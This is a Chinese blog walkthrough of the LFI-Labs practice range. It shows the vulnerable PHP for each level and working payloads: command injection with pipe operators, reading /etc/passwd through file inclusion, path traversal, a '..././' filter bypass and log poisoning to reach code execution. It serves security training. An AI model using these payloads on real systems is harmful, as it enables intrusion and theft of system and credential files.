LFI-labs

最新推荐文章于 2023-08-01 11:44:27 发布
最新推荐文章于 2023-08-01 11:44:27 发布
阅读量4k 收藏 22
点赞数 6
分类专栏: web做题记录 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51558360/article/details/120071274
版权

CMD-1

查看源码
在这里插入图片描述在这里插入图片描述
没有任何过滤,直接执行payload:

?cmd=whoami

CMD-2

在这里插入图片描述
如上payload,不过要换成post请求

CMD-3

在这里插入图片描述
在这里插入图片描述
试一下cmd-1的方法结果很显然
在这里插入图片描述

这里就要复习一下这个小知识点了

cmd1|cmd2:不论cmd1是否为真,cmd2都会被执行;
cmd1;cmd2:不论cmd1是否为真,cmd2都会被执行;
cmd1||cmd2:如果cmd1为假,则执行cmd2;
cmd1&&cmd2:如果cmd1为真,则执行cmd2;

上payload:

domain=google.com|whoami  cmd1位置可以随便什么东西

CMD-4

在这里插入图片描述
CMD-3方法换成post请求

CMD-5

查看源码 过滤了一大包东西

<?php
if (preg_match('/^[-a-z0-9]+\.a[cdefgilmnoqrstuwxz]|b[abdefghijmnorstvwyz]|c[acdfghiklmnoruvxyz]|d[ejkmoz]|e[cegrstu]|f[ijkmor]|g[abdefghilmnpqrstuwy]|h[kmnrtu]|i[delmnoqrst]|j[emop]|k[eghimnprwyz]|l[abcikrstuvy]|m[acdeghklmnopqrstuvwxyz]|n[acefgilopruz]|om|p[aefghklmnrstwy]|qa|r[eosuw]|s[abcdeghijklmnortuvyz]|t[cdfghjklmnoprtvwz]|u[agksyz]|v[aceginu]|w[fs]|y[et]|z[amw]|biz|cat|com|edu|gov|int|mil|net|org|pro|tel|aero|arpa|asia|coop|info|jobs|mobi|name|museum|travel|arpa|xn--[a-z0-9]+$/', strtolower($_GET["domain"])))
        { system("whois -h " . $_GET["server"] . " " . $_GET["domain"]); } 
    else 
        {echo "malformed domain name";}
    
 ?>

幸好没有对server进行过滤,所以直接对server进行构造。
域名查询语句:

whois -h [server] [domain]

payload:

domain=facebook.com&server=127.0.0.1|whoami||

二者合一得:

whois -h 127.0.0.1|whoami|| facebook.com

这里就执行whoami,facebook.com也被忽略了

CMD-6

CMD-5的post方式

LFI-1

<?php
include($_GET["page"]);
?>

这里没有过滤,且包含一个用户输入了的文件

page=C:/Windows/system.ini(windows)
page=/etc/passwd(Linux)

LFI-2

<?php
include("includes/".$_GET['library'].".php"); 
?>

这里添加了要包含文件的上级路径。所以我们要跳出includes,那么就可以使用…/跳出。

library=../../../zx

这里可以使用%00截断,也可以不使用,根据包含文件的类型判断。

LFI-3

<?php
if (substr($_GET['file'], -4, 4) != '.php')
 echo file_get_contents($_GET['file']);
else
 echo 'You are not allowed to see source files!'."\n";
?>

这里使用了substr()函数对传入的值进行截取判断,最后四位不能是.php。
这里绕过的方法有很多种:
1.大小写绕过
2.背后加’.’
3.背后加空格
4.背后加’/.’
5.使用’.ph<'进行.php拓展过滤渗出

LFI-4

<?php
include('includes/class_'.addslashes($_GET['class']).'.php');
?>

这里的addslash()会对预定义字符(以下字符)进行转义:
1.单引号
2.双引号
3.反斜杠
4.0x00

payload和LFI-2一样,不过返回的上级目录会多一点。

class=../../../../../../../../../../../../../../zx

LFI-5

<?php
   $file = str_replace('../', '', $_GET['file']);
   if(isset($file))
   {
       include("pages/$file");
   }
   else
   {
       include("index.php");
   }
?>

这里使用了str_replace()对…/进行了过滤,也就是说无法返回上级目录了,但是因为相当于删除操作,所以可以使用双写的方式进行绕过。

file=..././..././..././zx.php

在这里插入图片描述

LFI-6-10

前面五道题的post方式

LFI-11

<form action="/LFI-11/index.php" method="POST">
    <input type="text" name="file">
    <input type="hidden" name="style" name="stylepath">
</form>

<?php include($_POST['stylepath']); ?>

这里用POST提交参数,但是不是通过文本框中提交,真正的用hidden隐藏起来了。所以我们需要通过火狐/burp进行POST请求。
在这里插入图片描述

LFI-12

和11一样,不过是GET方式
在这里插入图片描述

LFI-13

和第五题一样

LFI-14

和上题一样,改成POST请求。

HDR-1

<?php
$template = 'blue.php';
if ( array_key_exists( $_COOKIE['TEMPLATE'] ) )
   $template = $_COOKIE['TEMPLATE'];
include ( dirname(FILE) . "/" . $template );
?>

array_key_exists(key,array):检查某个数组中是否存在指定的键名,如果键名存在则返回 true,如果键名不存在则返回 false。如果指定数组的时候省略了键名,将会生成从 0 开始并且每个键值对应以 1 递增的整数键名。
dirname(path):返回路径中的目录部分。

后面就不会了,先放着了

包含日志文件

要通过日志文件进行文件包含漏洞的利用,前提是需要知道日志的存放路径才行。
这里展示的是日志的默认路径:
在这里插入图片描述

因为日志也会记录我们的请求,所以利用方式就是在访问的时候输入文件包含的PHP代码,它会被写入日志文件中:
在这里插入图片描述

从上图可以看到浏览器会对它进行编码,所以我们在 burpsuite中进行抓包改包:
在这里插入图片描述

执行的时候会被禁止:
在这里插入图片描述

但它其实已经被写进日志文件了,重新访问的时候就会出现phpinfo.php的页面:
在这里插入图片描述

附上两条链接

本地文件漏洞bWAPP和DVWA

LFI漏洞利用总结

_pain_
关注
  • 6
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
文件包含漏洞之2LFI-Labs中的的利用和绕过
ISNS的博客
03-30 5448
一、环境搭建 1.环境描述 操作系统:win7 PHP集成环境:phpstudy 源码:LFI-Labs(去GitHub上下载) 将下载好的源码放在phpstudy的WWW目录下。 2.解决报错 如图所示,它会出现以下报错: 我找到的相关资料是: 这样的警告,只是一个因为PHP版本不同而产生的警告(NOTICE或者WARNING),而非错误(ERROR)。PHP中的变量在不声明的情况下使用 的...
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集.zip
09-18
lfi-labs, 用于实践开发 LFI RFI和CMD注入vulns的小型PHP脚本集 lfi实验室用于实践开发 LFI 。RFI和CMD注入vulns的小型PHP脚本集为什么?用于培训和测试。 你可以测试检测产品( 比如 。 漏洞扫描器),利用工具等。这些不是用来评估appsec测试工具的。这个想法是将这些添加到
lfi-labs-master闯关
lxl1229417712的博客
05-05 1883
第一关:第一个没有任何过滤,我们直接使用相对路径“page=../../phpinfo.php”就ok了 第二关: 将我们传入的library参数 前面加了“includes/” 后面加了“.php” 可以采用截断后面的“.php” 我们用“library=../../../phpinfo”执行即可 第三关(无回显):取文件最后面四位来判断是不是.php,绕过方法是在php后面加. “phpinfo.php.”或者“phpinfo.php/.”(尽量用本地地址),回显在检查中查看 第四
文件包含漏洞
weixin_45291045的博客
11-12 418
文章目录文件包含漏洞产生原因文件包含函数文件包含漏洞分类文件包含靶场练习LFI-1 文件包含漏洞产生原因 在包含文件时,为了灵活包含文件,将被包含文件设置为变量,同过动态变量来引入需要包含的文件时,用户可以对变量的值可控未对变量值进行合理的效验或者效验被绕过,这样就导致了文件包含漏洞 文件包含函数 include //会生成致命错误并停止脚本 include_once //语句在脚本执行期间包含并运行指定文件 require //只生成警告(E_WARNING),并且脚本会继续 require_onc
BUUCTF basic BUU BURP COURSE 1 & LFI Labs
网安小趴菜
08-27 2303
BUUCTF basic BUU BURP COURSE 1和LFI Labs
靶场练习-LFI_labs
Bcat_ZC的博客
08-01 582
LFI-04:想不到办法将URL里的.php去掉,/…/index报错,但是我觉得没啥问题。LFI-12:URL增加参数&stylepath=…LFI-11:BP抓包改&stylepath=…LFI-02:答案是%00截断,但是我没做出来,一直报错,求大佬指点。CMD-6:同上(都一个答案,估计前两道题答得不对。CMD-5:同上(是不是前两道题答得不对。CMD-4:同上(看了源代码才知道答案)LFI-07:同04。LFI-08:同06。LFI-09:同04。
关于 \lfi-labs-master\CMD-3 的正确解法
m0_47505062的博客
03-08 1276
我的实验环境是: C:\phpStudy\PHPTutorial\WWW\lfi-labs-master\CMD-3 先看一下实验的源码: <?php system("/usr/bin/whois " . $_GET["domain"]); ?> 首先,路径/usr/bin/whois 是linux环境下的目录,所以,这个实验在Windows环境中是无法成功完成的, 其次,whois是在linux中查询域名相关的命令,和Windows中的nslookup命令的功能相似, 两个解决方案
BUUCTF在线评测之Linux Labs 1
热门推荐
weixin_49182737的博客
03-02 1万+
这个测试没什么技术要求,只要了解ssh以及linux系统即可 点击启动靶机,出现的页面 点击所给的http链接,得到如下界面 Index of 这个页面啥也没有,没啥用 返回第一个界面,给出了ssh 以及映射地址和端口(这个地址+端口是随机的) 所以直接启动ssh链接即可 however!!!这里要 banter一下BUUCTF网站的这个Linux Labs 1测试中的这句话 这句话,不仅是说主机可以访问,且只有主机可以访问!!! As we all know,我们最常用的Windows OS没有自带
rhacm-labs
03-12
rhacm-labs
CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner:CNVD-2020-10487 CVE-2020-1938,扫描仪工具
03-20
python2多线程扫描Tomcat-Ajp协议文件重新定义 刷src分狗的福利poc扩大 poc作者不是本人!!!! 操作 1,将需要扫描的域名/ ip放于ip.txt ip.txt中不需要加协议,某种 ...拿到CNVD-2020-10487-Tomcat-Ajp-lfi.py测
labs-Oracle数据库案例
11-28
Oracle9i 数据库管理基础 I Ed 1.1 Vol031-1.pdf
labs:一个探索想法和试验前沿平台功能的地方
06-21
实验室 一个探索具有前沿平台功能的想法的地方。 注意:实验室存储库中的大多数代码都是实验性的,容易频繁更改,并且可能经常未经测试和损坏。
upload-labs通关手册
12-03
详细记录了upload-labs靶场的通关步骤,并且附带有caidao和burpsuite工具资源,非常适合初学者!!!
pao-labs
03-30
包实验室
lfipwn:LFI扫描,漏洞利用工具
07-12
飞艇 LFI扫描,漏洞利用工具
lfi-fuzz:用于枚举并尝试从LFI漏洞获取代码执行的python脚本
05-04
lfi-fuzz 用于枚举并尝试从LFI漏洞获取代码执行的python脚本 用法:lfi-fuzz.py [选项] 选项:-h,--help显示此帮助消息并退出-u URL,--url = URL您要测试的URL: : page LFI --traversal -file = TRAVERSAL_FILE...
命令执行漏洞——CMD
weixin_46601374的博客
04-04 1592
第一关 直接在后面跟上?cmd=whoami,即可看到命令执行成功 可以看见www-data; 可以知道这是使用的Ubuntu的服务器,根据服务其的目录可以查看自己想要的信息 当然可以查看一下版本信息 那能不能查看有没有flag: 还真能直接查到,可能是因为是第一关比较简单 第二关 和上一题一样都是需要传参,但是这次的是POST传参 第三关 和上题还不太一样,有whois,我去绕过看看 在后面加?domain=baidu.com...
lfi-labs靶场攻略
最新发布
09-25
引用中提到,lfi-labs是一个用于实践开发LFI、RFI和CMD注入漏洞的小型PHP脚本集,用于培训和测试。这个靶场可以用于测试产品(如漏洞扫描器)和利用工具。根据引用[3]中的攻略,lfi-labs靶场的攻略可以总结如下: - 第一关:直接使用相对路径"page=../../phpinfo.php"即可。 - 第二关:传入的library参数前面加上"includes/",后面加上".php",可以通过截断后面的".php"来绕过,使用"library=../../../phpinfo"进行执行。 - 第三关:通过判断文件名结尾是否为".php"来绕过,可以在"php"后面加上"."或者"phpinfo.php.",并通过检查回显来查看结果。 - 第四关:在文件名前面加上"includes/class_",变量使用addslashes函数处理,可以使用"class=../../../../../phpinfo"进行通过。 - 第五关:过滤掉输入参数中的"../",可以使用双写绕过,例如"file=..././..././..././phpinfo.php"。 - 第六关:在post data中加入参数"page=x.jpg"会上传到第六关文件中并生成"shell.php",可以使用蚁剑连接"shell.php"来成功攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值